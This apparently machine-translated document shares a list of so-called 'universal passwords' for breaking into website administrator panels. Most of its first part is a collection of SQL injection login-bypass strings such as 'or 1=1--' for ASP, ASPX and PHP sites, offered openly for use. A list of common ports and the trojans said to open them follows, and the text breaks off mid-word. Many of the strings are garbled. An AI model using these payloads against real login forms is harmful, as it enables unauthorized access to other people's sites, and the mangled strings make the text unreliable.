万能密码(Universal code).doc

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万能密码(Universal code)

万能密码(Universal code) The so-called universal password is to bypass the login authentication directly into the background administrator password, this type of password can be used directly to a lot of the existence of this vulnerability site so called universal. For everyone to share, and I hope to help you! ASP ASPX universal password 1:or=or 2:..Or. (.a.=.a) 3:or 1=1-- 4:or 1=1-- 5:aor1=1-- 6: or 1=1-- 7:or.a.=a 8: or = a=a 9:or= 10: or a = a Adminor 1=1# Universal PHP password Admin/* */password or 1=1/* Or a = a Or 1=1-- Or = Or = a=a Or1=1-- Or=or or=or or (a=a) .or. (.a.=.a). or 1=1 or 1=1-- or 1=1/* or = a=a or1=1 or= or=or= or=1 or=or or.a.=a or1=1-- 1or1=1 Aor1=1-- Aor1=1-- Ora=a Or 1=1-- Or1=1-- The tool can scan the common port and the specified port is open. Common port number: The commonly used proxy server port: (1). HTTP protocol proxy server port number: 80/8080/3128/8081/9080 (2). The SOCKS proxy protocol server port number: 1080 (3). FTP (File Transfer Protocol) proxy server port number: 21 (4). Telnet (Remote Login Protocol) proxy server port: 23 The HTTP server, the default port number for 80/tcp (Trojan Executor open this port); HTTPS (securely transferring web pages) server, the default port number for 443/tcp 443/udp; Telnet (hypertext transfer security), the default port number for the 23/tcp (Tiny Telnet Server Trojan open ports); FTP, the default port number for 21/tcp (Doly Trojan, Fore, Invisible Trojan FTP, WebEx, WinCrash and Blade Runner open ports); TFTP (Trivial File Transfer Protocol), the default port number for 69/udp; SSH (secure login), SCP (file transfer), port redirection, the default port number for 22/tcp; SMTP Simple Mail Transfer Protocol (E-mail), the default port number for 25/tcp (Sender, Password, Email Trojan Antigen Haebu Coceda, Shtrilitz Stealth, WinPC WinSpy, will open this port); POP3 Post Office Protocol (E-mail), the default port number for 110/tcp; WebLogic, the default port number is 7001; Webshpere applicatio


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